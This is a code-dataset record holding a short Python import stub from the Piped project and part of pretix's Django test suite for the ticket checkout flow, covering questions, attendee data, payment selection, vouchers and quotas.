c9e8a7d520f1520794289f6836b25245ebc144a5 | 149 | py | Python | contrib/status_testing/piped/plugins/status_testing_processors.py | alexbrasetvik/Piped | 0312c14d6c4c293df378c915cc9787bcc7faed36 | [
"MIT"
] | 3 | 2015-02-12T20:34:30.000Z | 2016-08-06T06:54:48.000Z | contrib/status_testing/piped/plugins/status_testing_processors.py | alexbrasetvik/Piped | 0312c14d6c4c293df378c915cc9787bcc7faed36 | [
"MIT"
] | null | null | null | contrib/status_testing/piped/plugins/status_testing_processors.py | alexbrasetvik/Piped | 0312c14d6c4c293df378c915cc9787bcc7faed36 | [
"MIT"
] | 2 | 2015-12-16T14:18:14.000Z | 2019-04-12T01:43:10.000Z | from piped_status_testing import version
from piped_status_testing.processors import ReporterCreator, StatusTestProcessor, WaitForReporterProcessing | 49.666667 | 107 | 0.912752 | 15 | 149 | 8.8 | 0.666667 | 0.136364 | 0.227273 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067114 | 149 | 3 | 107 | 49.666667 | 0.94964 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c9fface5158ccaae961297b71b7e9fa9fc4203e0 | 55,482 | py | Python | src/tests/presale/test_checkout.py | td00/pretix | e31bd7600c85598de135f2eb5012e2f33fdb1d11 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/presale/test_checkout.py | td00/pretix | e31bd7600c85598de135f2eb5012e2f33fdb1d11 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/presale/test_checkout.py | td00/pretix | e31bd7600c85598de135f2eb5012e2f33fdb1d11 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2017-08-09T17:11:28.000Z | 2017-08-09T17:11:28.000Z | import datetime
import os
from datetime import timedelta
from decimal import Decimal
from bs4 import BeautifulSoup
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.utils.timezone import now
from pretix.base.models import (
CartPosition, Event, Item, ItemCategory, Order, OrderPosition, Organizer,
Question, Quota, Voucher,
)
from pretix.base.models.items import ItemAddOn, ItemVariation, SubEventItem
class CheckoutTestCase(TestCase):
def setUp(self):
super().setUp()
self.orga = Organizer.objects.create(name='CCC', slug='ccc')
self.event = Event.objects.create(
organizer=self.orga, name='30C3', slug='30c3',
date_from=datetime.datetime(2013, 12, 26, tzinfo=datetime.timezone.utc),
plugins='pretix.plugins.stripe,pretix.plugins.banktransfer',
live=True
)
self.category = ItemCategory.objects.create(event=self.event, name="Everything", position=0)
self.quota_tickets = Quota.objects.create(event=self.event, name='Tickets', size=5)
self.ticket = Item.objects.create(event=self.event, name='Early-bird ticket',
category=self.category, default_price=23, admission=True)
self.quota_tickets.items.add(self.ticket)
self.event.settings.set('attendee_names_asked', False)
self.event.settings.set('payment_banktransfer__enabled', True)
self.client.get('/%s/%s/' % (self.orga.slug, self.event.slug))
self.session_key = self.client.cookies.get(settings.SESSION_COOKIE_NAME).value
self._set_session('email', 'admin@localhost')
self.workshopcat = ItemCategory.objects.create(name="Workshops", is_addon=True, event=self.event)
self.workshopquota = Quota.objects.create(event=self.event, name='Workshop 1', size=5)
self.workshop1 = Item.objects.create(event=self.event, name='Workshop 1',
category=self.workshopcat, default_price=12)
self.workshop2 = Item.objects.create(event=self.event, name='Workshop 2',
category=self.workshopcat, default_price=12)
self.workshop2a = ItemVariation.objects.create(item=self.workshop2, value='A')
self.workshop2b = ItemVariation.objects.create(item=self.workshop2, value='B')
self.workshopquota.items.add(self.workshop1)
self.workshopquota.items.add(self.workshop2)
self.workshopquota.variations.add(self.workshop2a)
self.workshopquota.variations.add(self.workshop2b)
def test_empty_cart(self):
response = self.client.get('/%s/%s/checkout/start' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/' % (self.orga.slug, self.event.slug),
target_status_code=200)
def test_questions(self):
q1 = Question.objects.create(
event=self.event, question='Age', type=Question.TYPE_NUMBER,
required=True
)
q2 = Question.objects.create(
event=self.event, question='How have you heard from us?', type=Question.TYPE_STRING,
required=False
)
self.ticket.questions.add(q1)
self.ticket.questions.add(q2)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
cr2 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=20, expires=now() + timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr1.id, q1.id))), 1)
self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr2.id, q1.id))), 1)
self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr1.id, q2.id))), 1)
self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr2.id, q2.id))), 1)
# Not all required fields filled out, expect failure
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-question_%s' % (cr1.id, q1.id): '42',
'%s-question_%s' % (cr2.id, q1.id): '',
'%s-question_%s' % (cr1.id, q2.id): 'Internet',
'%s-question_%s' % (cr2.id, q2.id): '',
'email': 'admin@localhost'
}, follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select('.has-error')), 1)
# Corrected request
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-question_%s' % (cr1.id, q1.id): '42',
'%s-question_%s' % (cr2.id, q1.id): '23',
'%s-question_%s' % (cr1.id, q2.id): 'Internet',
'%s-question_%s' % (cr2.id, q2.id): '',
'email': 'admin@localhost'
}, follow=True)
self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
target_status_code=200)
cr1 = CartPosition.objects.get(id=cr1.id)
cr2 = CartPosition.objects.get(id=cr2.id)
self.assertEqual(cr1.answers.filter(question=q1).count(), 1)
self.assertEqual(cr2.answers.filter(question=q1).count(), 1)
self.assertEqual(cr1.answers.filter(question=q2).count(), 1)
self.assertFalse(cr2.answers.filter(question=q2).exists())
def test_question_file_upload(self):
q1 = Question.objects.create(
event=self.event, question='Student ID', type=Question.TYPE_FILE,
required=False
)
self.ticket.questions.add(q1)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select('input[name=%s-question_%s]' % (cr1.id, q1.id))), 1)
f = SimpleUploadedFile("testfile.txt", b"file_content")
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-question_%s' % (cr1.id, q1.id): f,
'email': 'admin@localhost'
}, follow=True)
self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
target_status_code=200)
cr1 = CartPosition.objects.get(id=cr1.id)
a = cr1.answers.get(question=q1)
assert a.file
assert a.file.read() == b"file_content"
assert os.path.exists(os.path.join(settings.MEDIA_ROOT, a.file.name))
# Delete
self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-question_%s-clear' % (cr1.id, q1.id): 'on',
'email': 'admin@localhost'
}, follow=True)
assert not cr1.answers.exists()
assert not os.path.exists(os.path.join(settings.MEDIA_ROOT, a.file.name))
def test_attendee_email_required(self):
self.event.settings.set('attendee_emails_asked', True)
self.event.settings.set('attendee_emails_required', True)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select('input[name=%s-attendee_email]' % cr1.id)), 1)
# Not all required fields filled out, expect failure
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-attendee_email' % cr1.id: '',
'email': 'admin@localhost'
}, follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select('.has-error')), 1)
# Corrected request
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-attendee_email' % cr1.id: 'foo@localhost',
'email': 'admin@localhost'
}, follow=True)
self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
target_status_code=200)
cr1 = CartPosition.objects.get(id=cr1.id)
self.assertEqual(cr1.attendee_email, 'foo@localhost')
def test_attendee_name_required(self):
self.event.settings.set('attendee_names_asked', True)
self.event.settings.set('attendee_names_required', True)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select('input[name=%s-attendee_name]' % cr1.id)), 1)
# Not all required fields filled out, expect failure
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-attendee_name' % cr1.id: '',
'email': 'admin@localhost'
}, follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertGreaterEqual(len(doc.select('.has-error')), 1)
# Corrected request
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-attendee_name' % cr1.id: 'Peter',
'email': 'admin@localhost'
}, follow=True)
self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
target_status_code=200)
cr1 = CartPosition.objects.get(id=cr1.id)
self.assertEqual(cr1.attendee_name, 'Peter')
def test_attendee_name_optional(self):
self.event.settings.set('attendee_names_asked', True)
self.event.settings.set('attendee_names_required', False)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select('input[name=%s-attendee_name]' % cr1.id)), 1)
# Not all fields filled out, expect success
response = self.client.post('/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug), {
'%s-attendee_name' % cr1.id: '',
'email': 'admin@localhost'
}, follow=True)
self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
target_status_code=200)
cr1 = CartPosition.objects.get(id=cr1.id)
self.assertIsNone(cr1.attendee_name)
def test_payment(self):
# TODO: Test for correct payment method fees
self.event.settings.set('payment_stripe__enabled', True)
self.event.settings.set('payment_banktransfer__enabled', True)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select('input[name=payment]')), 2)
response = self.client.post('/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug), {
'payment': 'banktransfer'
}, follow=True)
self.assertRedirects(response, '/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug),
target_status_code=200)
def test_premature_confirm(self):
response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/' % (self.orga.slug, self.event.slug),
target_status_code=200)
self.event.settings.set('payment_stripe__enabled', True)
self.event.settings.set('payment_banktransfer__enabled', True)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/payment/' % (self.orga.slug, self.event.slug),
target_status_code=200)
self._set_session('payment', 'banktransfer')
self.event.settings.set('attendee_names_asked', True)
self.event.settings.set('attendee_names_required', True)
response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug),
target_status_code=200)
cr1.attendee_name = 'Peter'
cr1.save()
q1 = Question.objects.create(
event=self.event, question='Age', type=Question.TYPE_NUMBER,
required=True
)
self.ticket.questions.add(q1)
response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug),
target_status_code=200)
q1.required = False
q1.save()
response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
self.assertEqual(response.status_code, 200)
self._set_session('email', 'invalid')
response = self.client.get('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
self.assertRedirects(response, '/%s/%s/checkout/questions/' % (self.orga.slug, self.event.slug),
target_status_code=200)
def _set_session(self, key, value):
session = self.client.session
session[key] = value
session.save()
def test_subevent(self):
self.event.has_subevents = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now())
q = se.quotas.create(name="foo", size=None, event=self.event)
q.items.add(self.ticket)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10), subevent=se
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
self.assertEqual(OrderPosition.objects.first().subevent, se)
def test_free_price(self):
self.ticket.free_price = True
self.ticket.save()
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=42, expires=now() + timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
self.assertEqual(OrderPosition.objects.first().price, 42)
def test_confirm_in_time(self):
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
def test_subevent_confirm_expired_available(self):
self.event.has_subevents = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now())
se2 = self.event.subevents.create(name='Foo', date_from=now())
self.quota_tickets.size = 0
self.quota_tickets.subevent = se2
self.quota_tickets.save()
q2 = se.quotas.create(event=self.event, size=1, name='Bar')
q2.items.add(self.ticket)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10), subevent=se
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
def test_confirm_expired_available(self):
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
def test_subevent_confirm_price_changed(self):
self.event.has_subevents = True
self.event.save()
se = self.event.subevents.create(name='Foo', date_from=now())
q = se.quotas.create(name="foo", size=None, event=self.event)
q.items.add(self.ticket)
SubEventItem.objects.create(subevent=se, item=self.ticket, price=24)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10), subevent=se
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".alert-danger")), 1)
cr1 = CartPosition.objects.get(id=cr1.id)
self.assertEqual(cr1.price, 24)
def test_addon_price_included(self):
ItemAddOn.objects.create(base_item=self.ticket, addon_category=self.workshopcat, min_count=1,
price_included=True)
cp1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.workshop1,
price=0, expires=now() - timedelta(minutes=10),
addon_to=cp1
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertEqual(OrderPosition.objects.filter(item=self.workshop1).last().price, 0)
def test_confirm_price_changed(self):
self.ticket.default_price = 24
self.ticket.save()
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".alert-danger")), 1)
cr1 = CartPosition.objects.get(id=cr1.id)
self.assertEqual(cr1.price, 24)
def test_confirm_free_price_increased(self):
self.ticket.default_price = 24
self.ticket.free_price = True
self.ticket.save()
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".alert-danger")), 1)
cr1 = CartPosition.objects.get(id=cr1.id)
self.assertEqual(cr1.price, 24)
def test_voucher(self):
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
valid_until=now() + timedelta(days=2))
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() + timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
self.assertEqual(OrderPosition.objects.first().voucher, v)
self.assertEqual(Voucher.objects.get(pk=v.pk).redeemed, 1)
def test_voucher_required(self):
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
valid_until=now() + timedelta(days=2))
self.ticket.require_voucher = True
self.ticket.save()
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() + timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertEqual(Voucher.objects.get(pk=v.pk).redeemed, 1)
def test_voucher_required_but_missing(self):
self.ticket.require_voucher = True
self.ticket.save()
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() + timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
assert doc.select(".alert-danger")
def test_voucher_price_changed(self):
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
valid_until=now() + timedelta(days=2))
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=13, expires=now() - timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".alert-danger")), 1)
cr1 = CartPosition.objects.get(id=cr1.id)
self.assertEqual(cr1.price, Decimal('12.00'))
def test_voucher_redeemed(self):
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event,
valid_until=now() + timedelta(days=2), redeemed=1)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertIn("has already been", doc.select(".alert-danger")[0].text)
def test_voucher_multiuse_redeemed(self):
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event,
valid_until=now() + timedelta(days=2), max_usages=3, redeemed=3)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertIn("has already been", doc.select(".alert-danger")[0].text)
def test_voucher_multiuse_partially(self):
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
valid_until=now() + timedelta(days=2), max_usages=3, redeemed=2)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertIn("has already been", doc.select(".alert-danger")[0].text)
assert CartPosition.objects.filter(cart_id=self.session_key).count() == 1
def test_voucher_multiuse_ok(self):
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
valid_until=now() + timedelta(days=2), max_usages=3, redeemed=1)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(cart_id=self.session_key).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 2)
v.refresh_from_db()
assert v.redeemed == 3
def test_voucher_multiuse_in_other_cart_expired(self):
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event,
price_mode='set',
valid_until=now() + timedelta(days=2), max_usages=3, redeemed=1)
CartPosition.objects.create(
event=self.event, cart_id='other', item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(cart_id=self.session_key).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 2)
v.refresh_from_db()
assert v.redeemed == 3
def test_voucher_multiuse_in_other_cart(self):
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
valid_until=now() + timedelta(days=2), max_usages=3, redeemed=1)
CartPosition.objects.create(
event=self.event, cart_id='other', item=self.ticket,
price=12, expires=now() + timedelta(minutes=10), voucher=v
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertIn("has already been", doc.select(".alert-danger")[0].text)
assert CartPosition.objects.filter(cart_id=self.session_key).count() == 1
def test_voucher_ignore_quota(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
valid_until=now() + timedelta(days=2), allow_ignore_quota=True)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
def test_voucher_block_quota(self):
self.quota_tickets.size = 1
self.quota_tickets.save()
v = Voucher.objects.create(item=self.ticket, value=Decimal('12.00'), event=self.event, price_mode='set',
valid_until=now() + timedelta(days=2), block_quota=True)
cr1 = CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10)
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".alert-danger")), 1)
self.assertEqual(CartPosition.objects.filter(cart_id=self.session_key).count(), 1)
cr1.voucher = v
cr1.save()
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertEqual(len(doc.select(".thank-you")), 1)
self.assertFalse(CartPosition.objects.filter(id=cr1.id).exists())
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderPosition.objects.count(), 1)
def test_voucher_block_quota_other_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
q2 = self.event.quotas.create(name='Testquota', size=0)
q2.items.add(self.ticket)
v = Voucher.objects.create(quota=self.quota_tickets, value=Decimal('12.00'), event=self.event,
valid_until=now() + timedelta(days=2), block_quota=True)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=12, expires=now() - timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
doc = BeautifulSoup(response.rendered_content, "lxml")
self.assertTrue(doc.select(".alert-danger"))
self.assertFalse(Order.objects.exists())
def test_voucher_double(self):
self.quota_tickets.size = 2
self.quota_tickets.save()
v = Voucher.objects.create(item=self.ticket, event=self.event,
valid_until=now() + timedelta(days=2), block_quota=True)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10), voucher=v
)
CartPosition.objects.create(
event=self.event, cart_id=self.session_key, item=self.ticket,
price=23, expires=now() + timedelta(minutes=10), voucher=v
)
self._set_session('payment', 'banktransfer')
response = self.client.post('/%s/%s/checkout/confirm/' % (self.orga.slug, self.event.slug), follow=True)
